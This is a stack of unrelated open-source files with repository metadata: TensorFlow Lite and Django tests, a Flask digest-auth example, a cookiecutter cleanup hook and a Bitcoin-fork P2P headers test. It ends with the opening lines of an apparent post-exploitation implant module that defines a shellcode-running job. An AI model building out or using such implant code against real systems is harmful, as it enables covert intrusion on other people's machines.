def make_unidirectional_sequence_lstm_tests(options):
"""Make a set of tests to do unidirectional_sequence_lstm."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"use_peepholes": [False, True],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"],
use_peepholes=parameters["use_peepholes"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
lstm_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
lstm_cell = tf.lite.experimental.nn.TFLiteLSTMCell(
parameters["units"], use_peepholes=parameters["use_peepholes"])
outs, _ = tf.nn.static_rnn(lstm_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
# Tflite fused kernel takes input as [time, batch, input].
# For static unidirectional sequence lstm, the input is an array sized of
# time, and pack the array together, however, for time = 1, the input is
# not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function(name="make_unidirectional_sequence_rnn_tests")
@test_util.enable_control_flow_v2
def make_unidirectional_sequence_rnn_tests(options):
"""Make a set of tests to do unidirectional_sequence_rnn."""
test_parameters = [{
"batch_size": [2, 4, 6],
"seq_length": [1, 3],
"units": [4, 5],
"is_dynamic_rnn": [False, True]
}]
def build_graph(parameters):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = tf.placeholder(dtype=tf.float32, name="input", shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.lite.experimental.nn.dynamic_rnn(
rnn_cell, input_value, dtype=tf.float32, time_major=True)
outs = tf.unstack(outs, axis=1)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = tf.placeholder(
dtype=tf.float32, name=("input_%d" % i), shape=shape)
input_values.append(input_value)
rnn_cell = tf.lite.experimental.nn.TfLiteRNNCell(parameters["units"])
outs, _ = tf.nn.static_rnn(rnn_cell, input_values, dtype=tf.float32)
real_output = tf.zeros([1], dtype=tf.float32) + outs[-1]
return input_values, [real_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
if parameters["is_dynamic_rnn"]:
shape = [
parameters["seq_length"], parameters["batch_size"],
parameters["units"]
]
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
else:
shape = [parameters["batch_size"], parameters["units"]]
for i in range(parameters["seq_length"]):
input_value = create_tensor_data(tf.float32, shape)
input_values.append(input_value)
init = tf.global_variables_initializer()
sess.run(init)
# Tflite fused kernel takes input as [time, batch, input].
# For static unidirectional sequence rnn, the input is an array sized of
# time, and pack the array together, however, for time = 1, the input is
# not packed.
tflite_input_values = input_values
if not parameters["is_dynamic_rnn"] and parameters["seq_length"] == 1:
tflite_input_values = [
input_values[0].reshape((1, parameters["batch_size"],
parameters["units"]))
]
return tflite_input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_unfused_gru_tests(options):
"""Make a set of tests for unfused gru op."""
test_parameters = [{
"units": [2, 5],
"batch_size": [1, 2],
"time": [3],
}]
def build_graph(parameters):
inputs = [
tf.placeholder(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
cell_fw = tf.nn.rnn_cell.GRUCell(parameters["units"])
cell_bw = tf.nn.rnn_cell.GRUCell(parameters["units"])
outputs, _, _ = tf.nn.static_bidirectional_rnn(
cell_fw, cell_bw, inputs, dtype=tf.float32)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(tf.float32,
[parameters["batch_size"], parameters["units"]])
for _ in range(parameters["time"])
]
init = tf.global_variables_initializer()
sess.run(init)
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
# Toco binary path provided by the generate rule.
bin_path = None
def generate_examples(options):
global bin_path
def mkdir_if_not_exist(x):
if not os.path.isdir(x):
os.mkdir(x)
if not os.path.isdir(x):
raise RuntimeError("Failed to create dir %r" % x)
opstest_path = os.path.join(options.output_path)
mkdir_if_not_exist(opstest_path)
out = options.zip_to_output
bin_path = options.toco
# Some zip filenames contain a postfix identifying the conversion mode. The
# list of valid conversion modes is defined in
# generated_test_conversion_modes() in build_def.bzl.
test_function = ("make_%s_tests" % (out.replace(".zip", "").replace(
"pb2lite", "").replace("toco-flex", "").rstrip("_")))
if test_function not in _MAKE_TEST_FUNCTIONS_MAP:
raise RuntimeError("Can't find a test function to create %r. Tried %r" %
(out, test_function))
_MAKE_TEST_FUNCTIONS_MAP[test_function](options)
| {
"content_hash": "65833289b44bb6110e3008350a384b1b",
"timestamp": "",
"source": "github",
"line_count": 4981,
"max_line_length": 80,
"avg_line_length": 34.391688415980724,
"alnum_prop": 0.5973205685765156,
"repo_name": "ghchinoy/tensorflow",
"id": "42bab6977253db120b3d479fa7876692730a23f8",
"size": "171995",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/lite/testing/generate_examples_lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3568"
},
{
"name": "Batchfile",
"bytes": "15317"
},
{
"name": "C",
"bytes": "699905"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "67022491"
},
{
"name": "CMake",
"bytes": "206499"
},
{
"name": "Dockerfile",
"bytes": "73602"
},
{
"name": "Go",
"bytes": "1585039"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "836400"
},
{
"name": "Jupyter Notebook",
"bytes": "1665583"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "98194"
},
{
"name": "Objective-C",
"bytes": "94022"
},
{
"name": "Objective-C++",
"bytes": "175222"
},
{
"name": "PHP",
"bytes": "17600"
},
{
"name": "Pascal",
"bytes": "3239"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "48407007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4733"
},
{
"name": "Shell",
"bytes": "476920"
},
{
"name": "Smarty",
"bytes": "27495"
},
{
"name": "Swift",
"bytes": "56155"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from django.test.client import RequestFactory, Client
from prescription.models import Pattern
from prescription.views import CreatePatternView
from user.models import HealthProfessional
class TestCreatePattern(TestCase):
def setUp(self):
self.factory = RequestFactory()
self.my_class = Pattern
self.my_view = CreatePatternView()
self.user = HealthProfessional()
self.user.email = 'email@email.com'
self.user.save()
self.name = "Pattern de teste"
self.user_creator = self.user
self.clinic = "clinica de teste"
self.header = "header de teste"
self.font = 'Helvetica'
self.font_size = '12'
self.footer = "footer de teste"
self.pagesize = "letter"
def test_pattern_redirect_valid(self):
data = {
'name': self.name,
'clinic': self.clinic,
'font': 'Helvetica',
'font_size': '12',
'header': self.header,
'footer': self.footer,
'pagesize': self.pagesize,
}
request = self.factory.post('/', data)
request.user = self.user
response = CreatePatternView.as_view()(request)
self.assertEqual(response.status_code, 302)
def test_pattern_get(self):
request = self.factory.get('/prescription/create_prescription_model/')
request.user = self.user
# Get the response
response = self.my_view.get(request)
self.assertEqual(response.status_code, 200)
| {
"content_hash": "637b1c4cfdd5f6e9db13430c69dd5d07",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 78,
"avg_line_length": 30.30188679245283,
"alnum_prop": 0.5990037359900373,
"repo_name": "fga-gpp-mds/2017.2-Receituario-Medico",
"id": "0f813fb84973c2aa233212613aae998ab35e05cb",
"size": "1606",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "medical_prescription/prescription/test/test_view_createpattern.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2123328"
},
{
"name": "CoffeeScript",
"bytes": "102158"
},
{
"name": "HTML",
"bytes": "2703462"
},
{
"name": "JavaScript",
"bytes": "7544427"
},
{
"name": "Makefile",
"bytes": "1369"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PowerShell",
"bytes": "471"
},
{
"name": "Python",
"bytes": "627321"
},
{
"name": "Ruby",
"bytes": "1030"
},
{
"name": "Shell",
"bytes": "3774"
}
],
"symlink_target": ""
} |
from flask import Flask
from flask_digest import Stomach
app = Flask(__name__)
stomach = Stomach('realm')
db = dict()
@stomach.register
def add_user(username, password):
print(username, password)
db[username] = password
@stomach.access
def get_user(username):
return db.get(username, None)
@app.route('/')
@stomach.protect
def main():
return '<h1> resource <h1>'
add_user('admin', '12345')
app.run()
| {
"content_hash": "d7b8d0d7ea69bd39ab2aca820616b8d3",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 33,
"avg_line_length": 17.583333333333332,
"alnum_prop": 0.6848341232227488,
"repo_name": "vctandrade/flask-digest",
"id": "b0e8a3a1b94f63eef5a87d5ce56af4cdc2aab59f",
"size": "422",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/quickstart.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5632"
}
],
"symlink_target": ""
} |
import os
import sys
import shutil
use_celery = '{{cookiecutter.use_celery}}'
if use_celery == "no":
base_path = os.getcwd()
app_path = os.path.join(
base_path,
'{{cookiecutter.app_name}}',
)
tasks_path = os.path.join(app_path, 'tasks')
celery_app_path = os.path.join(app_path, 'celery_app.py')
try:
shutil.rmtree(tasks_path)
except Exception:
print("ERROR: cannot delete celery tasks path %s" % tasks_path)
sys.exit(1)
try:
os.remove(celery_app_path)
except Exception:
print("ERROR: cannot delete celery application file")
sys.exit(1)
try:
os.remove(os.path.join(base_path, "tests", "test_celery.py"))
except Exception:
print("ERROR: cannot delete celery tests files")
sys.exit(1)
| {
"content_hash": "2cba0751cc07976bb87b2f702aaf2478",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 71,
"avg_line_length": 24.848484848484848,
"alnum_prop": 0.6036585365853658,
"repo_name": "karec/cookiecutter-flask-restful",
"id": "af2a9bbf593c8f79e84b326368c8afaca68252d1",
"size": "820",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hooks/post_gen_project.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "656"
},
{
"name": "Makefile",
"bytes": "1264"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "34296"
}
],
"symlink_target": ""
} |
import os.path
from django.conf import settings
from django.test import TransactionTestCase
from panda.tests import utils
class TestRelatedUpload(TransactionTestCase):
fixtures = ['init_panda.json', 'test_users.json']
def setUp(self):
settings.CELERY_ALWAYS_EAGER = True
self.user = utils.get_panda_user()
self.dataset = utils.get_test_dataset(self.user)
self.upload = utils.get_test_related_upload(self.user, self.dataset)
def test_created(self):
self.assertEqual(self.upload.original_filename, utils.TEST_DATA_FILENAME)
self.assertEqual(self.upload.creator, self.user)
self.assertNotEqual(self.upload.creation_date, None)
self.assertEqual(self.upload.dataset, self.dataset)
def test_delete(self):
path = self.upload.get_path()
self.assertEqual(os.path.isfile(path), True)
self.upload.delete()
self.assertEqual(os.path.exists(path), False)
| {
"content_hash": "71a9a2131c5d138438921f5cde233931",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 81,
"avg_line_length": 30.125,
"alnum_prop": 0.6939834024896265,
"repo_name": "PalmBeachPost/panda",
"id": "1c4ffbaa4b0db6bd96ff2920b25da91789dcf806",
"size": "987",
"binary": false,
"copies": "6",
"ref": "refs/heads/1.2.0",
"path": "panda/tests/test_related_upload.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "14837"
},
{
"name": "HTML",
"bytes": "51564"
},
{
"name": "Java",
"bytes": "256"
},
{
"name": "JavaScript",
"bytes": "759191"
},
{
"name": "Python",
"bytes": "877718"
},
{
"name": "Shell",
"bytes": "17522"
}
],
"symlink_target": ""
} |
from test_framework.mininode import *
from test_framework.test_framework import FlurboTestFramework
from test_framework.util import *
from test_framework.blocktools import create_block, create_coinbase
'''
SendHeadersTest -- test behavior of headers messages to announce blocks.
Setup:
- Two nodes, two p2p connections to node0. One p2p connection should only ever
receive inv's (omitted from testing description below, this is our control).
Second node is used for creating reorgs.
Part 1: No headers announcements before "sendheaders"
a. node mines a block [expect: inv]
send getdata for the block [expect: block]
b. node mines another block [expect: inv]
send getheaders and getdata [expect: headers, then block]
c. node mines another block [expect: inv]
peer mines a block, announces with header [expect: getdata]
d. node mines another block [expect: inv]
Part 2: After "sendheaders", headers announcements should generally work.
a. peer sends sendheaders [expect: no response]
peer sends getheaders with current tip [expect: no response]
b. node mines a block [expect: tip header]
c. for N in 1, ..., 10:
* for announce-type in {inv, header}
- peer mines N blocks, announces with announce-type
[ expect: getheaders/getdata or getdata, deliver block(s) ]
- node mines a block [ expect: 1 header ]
Part 3: Headers announcements stop after large reorg and resume after getheaders or inv from peer.
- For response-type in {inv, getheaders}
* node mines a 7 block reorg [ expect: headers announcement of 8 blocks ]
* node mines an 8-block reorg [ expect: inv at tip ]
* peer responds with getblocks/getdata [expect: inv, blocks ]
* node mines another block [ expect: inv at tip, peer sends getdata, expect: block ]
* node mines another block at tip [ expect: inv ]
* peer responds with getheaders with an old hashstop more than 8 blocks back [expect: headers]
* peer requests block [ expect: block ]
* node mines another block at tip [ expect: inv, peer sends getdata, expect: block ]
* peer sends response-type [expect headers if getheaders, getheaders/getdata if mining new block]
* node mines 1 block [expect: 1 header, peer responds with getdata]
Part 4: Test direct fetch behavior
a. Announce 2 old block headers.
Expect: no getdata requests.
b. Announce 3 new blocks via 1 headers message.
Expect: one getdata request for all 3 blocks.
(Send blocks.)
c. Announce 1 header that forks off the last two blocks.
Expect: no response.
d. Announce 1 more header that builds on that fork.
Expect: one getdata request for two blocks.
e. Announce 16 more headers that build on that fork.
Expect: getdata request for 14 more blocks.
f. Announce 1 more header that builds on that fork.
Expect: no response.
'''
class BaseNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.last_inv = None
self.last_headers = None
self.last_block = None
self.ping_counter = 1
self.last_pong = msg_pong(0)
self.last_getdata = None
self.sleep_time = 0.05
self.block_announced = False
def clear_last_announcement(self):
with mininode_lock:
self.block_announced = False
self.last_inv = None
self.last_headers = None
def add_connection(self, conn):
self.connection = conn
# Request data for a list of block hashes
def get_data(self, block_hashes):
msg = msg_getdata()
for x in block_hashes:
msg.inv.append(CInv(2, x))
self.connection.send_message(msg)
def get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.connection.send_message(msg)
def send_block_inv(self, blockhash):
msg = msg_inv()
msg.inv = [CInv(2, blockhash)]
self.connection.send_message(msg)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_inv(self, conn, message):
self.last_inv = message
self.block_announced = True
def on_headers(self, conn, message):
self.last_headers = message
self.block_announced = True
def on_block(self, conn, message):
self.last_block = message.block
self.last_block.calc_sha256()
def on_getdata(self, conn, message):
self.last_getdata = message
def on_pong(self, conn, message):
self.last_pong = message
# Test whether the last announcement we received had the
# right header or the right inv
# inv and headers should be lists of block hashes
def check_last_announcement(self, headers=None, inv=None):
expect_headers = headers if headers != None else []
expect_inv = inv if inv != None else []
test_function = lambda: self.block_announced
self.sync(test_function)
with mininode_lock:
self.block_announced = False
success = True
compare_inv = []
if self.last_inv != None:
compare_inv = [x.hash for x in self.last_inv.inv]
if compare_inv != expect_inv:
success = False
hash_headers = []
if self.last_headers != None:
# treat headers as a list of block hashes
hash_headers = [ x.sha256 for x in self.last_headers.headers ]
if hash_headers != expect_headers:
success = False
self.last_inv = None
self.last_headers = None
return success
# Syncing helpers
def sync(self, test_function, timeout=60):
while timeout > 0:
with mininode_lock:
if test_function():
return
time.sleep(self.sleep_time)
timeout -= self.sleep_time
raise AssertionError("Sync failed to complete")
def sync_with_ping(self, timeout=60):
self.send_message(msg_ping(nonce=self.ping_counter))
test_function = lambda: self.last_pong.nonce == self.ping_counter
self.sync(test_function, timeout)
self.ping_counter += 1
return
def wait_for_block(self, blockhash, timeout=60):
test_function = lambda: self.last_block != None and self.last_block.sha256 == blockhash
self.sync(test_function, timeout)
return
def wait_for_getdata(self, hash_list, timeout=60):
if hash_list == []:
return
test_function = lambda: self.last_getdata != None and [x.hash for x in self.last_getdata.inv] == hash_list
self.sync(test_function, timeout)
return
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [ CBlockHeader(b) for b in new_blocks ]
self.send_message(headers_message)
def send_getblocks(self, locator):
getblocks_message = msg_getblocks()
getblocks_message.locator.vHave = locator
self.send_message(getblocks_message)
# InvNode: This peer should only ever receive inv's, because it doesn't ever send a
# "sendheaders" message.
class InvNode(BaseNode):
def __init__(self):
BaseNode.__init__(self)
# TestNode: This peer is the one we use for most of the testing.
class TestNode(BaseNode):
def __init__(self):
BaseNode.__init__(self)
class SendHeadersTest(FlurboTestFramework):
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
self.nodes = []
self.nodes = start_nodes(2, self.options.tmpdir, [["-debug", "-logtimemicros=1"]]*2)
connect_nodes(self.nodes[0], 1)
# mine count blocks and return the new tip
def mine_blocks(self, count):
# Clear out last block announcement from each p2p listener
[ x.clear_last_announcement() for x in self.p2p_connections ]
self.nodes[0].generate(count)
return int(self.nodes[0].getbestblockhash(), 16)
# mine a reorg that invalidates length blocks (replacing them with
# length+1 blocks).
# Note: we clear the state of our p2p connections after the
# to-be-reorged-out blocks are mined, so that we don't break later tests.
# return the list of block hashes newly mined
def mine_reorg(self, length):
self.nodes[0].generate(length) # make sure all invalidated blocks are node0's
sync_blocks(self.nodes, wait=0.1)
[x.clear_last_announcement() for x in self.p2p_connections]
tip_height = self.nodes[1].getblockcount()
hash_to_invalidate = self.nodes[1].getblockhash(tip_height-(length-1))
self.nodes[1].invalidateblock(hash_to_invalidate)
all_hashes = self.nodes[1].generate(length+1) # Must be longer than the orig chain
sync_blocks(self.nodes, wait=0.1)
return [int(x, 16) for x in all_hashes]
def run_test(self):
# Setup the p2p connections and start up the network thread.
inv_node = InvNode()
test_node = TestNode()
self.p2p_connections = [inv_node, test_node]
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], inv_node))
# Set nServices to 0 for test_node, so no block download will occur outside of
# direct fetching
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node, services=0))
inv_node.add_connection(connections[0])
test_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
inv_node.wait_for_verack()
test_node.wait_for_verack()
tip = int(self.nodes[0].getbestblockhash(), 16)
# PART 1
# 1. Mine a block; expect inv announcements each time
print("Part 1: headers don't start before sendheaders message...")
for i in range(4):
old_tip = tip
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(inv=[tip]), True)
# Try a few different responses; none should affect next announcement
if i == 0:
# first request the block
test_node.get_data([tip])
test_node.wait_for_block(tip, timeout=5)
elif i == 1:
# next try requesting header and block
test_node.get_headers(locator=[old_tip], hashstop=tip)
test_node.get_data([tip])
test_node.wait_for_block(tip)
test_node.clear_last_announcement() # since we requested headers...
elif i == 2:
# this time announce own block via headers
height = self.nodes[0].getblockcount()
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
new_block = create_block(tip, create_coinbase(height+1), block_time)
new_block.solve()
test_node.send_header_for_blocks([new_block])
test_node.wait_for_getdata([new_block.sha256], timeout=5)
test_node.send_message(msg_block(new_block))
test_node.sync_with_ping() # make sure this block is processed
inv_node.clear_last_announcement()
test_node.clear_last_announcement()
print("Part 1: success!")
print("Part 2: announce blocks with headers after sendheaders message...")
# PART 2
# 2. Send a sendheaders message and test that headers announcements
# commence and keep working.
test_node.send_message(msg_sendheaders())
prev_tip = int(self.nodes[0].getbestblockhash(), 16)
test_node.get_headers(locator=[prev_tip], hashstop=0)
test_node.sync_with_ping()
# Now that we've synced headers, headers announcements should work
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=[tip]), True)
height = self.nodes[0].getblockcount()+1
block_time += 10 # Advance far enough ahead
for i in range(10):
# Mine i blocks, and alternate announcing either via
# inv (of tip) or via headers. After each, new blocks
# mined by the node should successfully be announced
# with block header, even though the blocks are never requested
for j in range(2):
blocks = []
for b in range(i+1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
if j == 0:
# Announce via inv
test_node.send_block_inv(tip)
test_node.wait_for_getdata([tip], timeout=5)
# Test that duplicate inv's won't result in duplicate
# getdata requests, or duplicate headers announcements
inv_node.send_block_inv(tip)
# Should have received a getheaders as well!
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks[0:-1]], timeout=5)
[ inv_node.send_block_inv(x.sha256) for x in blocks[0:-1] ]
inv_node.sync_with_ping()
else:
# Announce via headers
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=5)
# Test that duplicate headers won't result in duplicate
# getdata requests (the check is further down)
inv_node.send_header_for_blocks(blocks)
inv_node.sync_with_ping()
[ test_node.send_message(msg_block(x)) for x in blocks ]
test_node.sync_with_ping()
inv_node.sync_with_ping()
# This block should not be announced to the inv node (since it also
# broadcast it)
assert_equal(inv_node.last_inv, None)
assert_equal(inv_node.last_headers, None)
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=[tip]), True)
height += 1
block_time += 1
print("Part 2: success!")
print("Part 3: headers announcements can stop after large reorg, and resume after headers/inv from peer...")
# PART 3. Headers announcements can stop after large reorg, and resume after
# getheaders or inv from peer.
for j in range(2):
# First try mining a reorg that can propagate with header announcement
new_block_hashes = self.mine_reorg(length=7)
tip = new_block_hashes[-1]
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=new_block_hashes), True)
block_time += 8
# Mine a too-large reorg, which should be announced with a single inv
new_block_hashes = self.mine_reorg(length=8)
tip = new_block_hashes[-1]
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(inv=[tip]), True)
block_time += 9
fork_point = self.nodes[0].getblock("%02x" % new_block_hashes[0])["previousblockhash"]
fork_point = int(fork_point, 16)
# Use getblocks/getdata
test_node.send_getblocks(locator = [fork_point])
assert_equal(test_node.check_last_announcement(inv=new_block_hashes), True)
test_node.get_data(new_block_hashes)
test_node.wait_for_block(new_block_hashes[-1])
for i in range(3):
# Mine another block, still should get only an inv
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(inv=[tip]), True)
if i == 0:
# Just get the data -- shouldn't cause headers announcements to resume
test_node.get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# Send a getheaders message that shouldn't trigger headers announcements
# to resume (best header sent will be too old)
test_node.get_headers(locator=[fork_point], hashstop=new_block_hashes[1])
test_node.get_data([tip])
test_node.wait_for_block(tip)
elif i == 2:
test_node.get_data([tip])
test_node.wait_for_block(tip)
# This time, try sending either a getheaders to trigger resumption
# of headers announcements, or mine a new block and inv it, also
# triggering resumption of headers announcements.
if j == 0:
test_node.get_headers(locator=[tip], hashstop=0)
test_node.sync_with_ping()
else:
test_node.send_block_inv(tip)
test_node.sync_with_ping()
# New blocks should now be announced with header
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=[tip]), True)
print("Part 3: success!")
print("Part 4: Testing direct fetch behavior...")
tip = self.mine_blocks(1)
height = self.nodes[0].getblockcount() + 1
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
# Create 2 blocks. Send the blocks, then send the headers.
blocks = []
for b in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
inv_node.send_message(msg_block(blocks[-1]))
inv_node.sync_with_ping() # Make sure blocks are processed
test_node.last_getdata = None
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
# should not have received any getdata messages
with mininode_lock:
assert_equal(test_node.last_getdata, None)
# This time, direct fetch should work
blocks = []
for b in range(3):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=test_node.sleep_time)
[ test_node.send_message(msg_block(x)) for x in blocks ]
test_node.sync_with_ping()
# Now announce a header that forks the last two blocks
tip = blocks[0].sha256
height -= 1
blocks = []
# Create extra blocks for later
for b in range(20):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Announcing one block on fork should not trigger direct fetch
# (less work than tip)
test_node.last_getdata = None
test_node.send_header_for_blocks(blocks[0:1])
test_node.sync_with_ping()
with mininode_lock:
assert_equal(test_node.last_getdata, None)
# Announcing one more block on fork should trigger direct fetch for
# both blocks (same work as tip)
test_node.send_header_for_blocks(blocks[1:2])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[0:2]], timeout=test_node.sleep_time)
# Announcing 16 more headers should trigger direct fetch for 14 more
# blocks
test_node.send_header_for_blocks(blocks[2:18])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[2:16]], timeout=test_node.sleep_time)
# Announcing 1 more header should not trigger any response
test_node.last_getdata = None
test_node.send_header_for_blocks(blocks[18:19])
test_node.sync_with_ping()
with mininode_lock:
assert_equal(test_node.last_getdata, None)
print("Part 4: success!")
# Finally, check that the inv node never received a getdata request,
# throughout the test
assert_equal(inv_node.last_getdata, None)
if __name__ == '__main__':
SendHeadersTest().main()
| {
"content_hash": "cd5ff3091b48b9ff8940468cffd30269",
"timestamp": "",
"source": "github",
"line_count": 511,
"max_line_length": 116,
"avg_line_length": 42.336594911937375,
"alnum_prop": 0.6041878524544698,
"repo_name": "Flurbos/Flurbo",
"id": "8943021d524cf87ef05a162c69671c54a0dc0716",
"size": "21848",
"binary": false,
"copies": "1",
"ref": "refs/heads/0.12.2",
"path": "qa/rpc-tests/sendheaders.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "644262"
},
{
"name": "C++",
"bytes": "4192638"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2099"
},
{
"name": "M4",
"bytes": "145618"
},
{
"name": "Makefile",
"bytes": "95713"
},
{
"name": "Objective-C",
"bytes": "3686"
},
{
"name": "Objective-C++",
"bytes": "7238"
},
{
"name": "Python",
"bytes": "681152"
},
{
"name": "QMake",
"bytes": "2019"
},
{
"name": "Roff",
"bytes": "3753"
},
{
"name": "Shell",
"bytes": "35693"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'remembermyseries.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^tvapp/', include('tvapp.urls')),
url(r'^admin/', include(admin.site.urls)),
)
| {
"content_hash": "e14e12f900b04b4bfe1050339480dff5",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 61,
"avg_line_length": 32.8,
"alnum_prop": 0.6432926829268293,
"repo_name": "niksolaz/TvApp",
"id": "85ef4a1674a7811e944080ae8c6573aa403d343d",
"size": "328",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "remembermyseries/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10147"
}
],
"symlink_target": ""
} |
import core.implant
import core.job
import core.cred_parser
import string
import collections
import time
import uuid
class DynWrapXShellcodeJob(core.job.Job):
def create(self):
self.fork32Bit = True
self.errstat = 0
self.options.set("DLLUUID", uuid.uuid4().hex)
